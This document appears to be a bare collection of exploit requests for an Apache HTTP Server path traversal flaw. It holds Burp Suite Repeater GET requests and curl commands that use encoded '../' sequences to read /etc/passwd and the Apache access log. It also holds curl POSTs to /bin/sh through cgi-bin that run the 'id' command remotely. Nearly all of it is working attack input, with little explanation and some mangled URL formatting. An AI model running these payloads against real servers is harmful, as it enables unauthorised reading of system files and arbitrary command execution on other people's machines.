BURP SUITE REPEATER
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 Host: <https://please-update-to-apache-2.4.50-for-fix.com> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Pragma: no-cache Cache-Control: no-cache
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 Host: <https://please-update-to-apache-2.4.50-for-fix.com> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Pragma: no-cache Cache-Control: no-cache
CURL
curl -s --path-as-is <http://localhost:8080/icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
>
curl -s --path-as-is <http://localhost:8080/icons/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
>
curl -s --path-as-is <http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
>
curl -s --path-as-is <http://localhost:8080/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
>
LOGS
curl -s --path-as-is <http://localhost:8080/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/usr/local/apache/logs/access_log
>
curl --data "echo;id" '<http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh>' curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; id' "<http://localhost:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh>"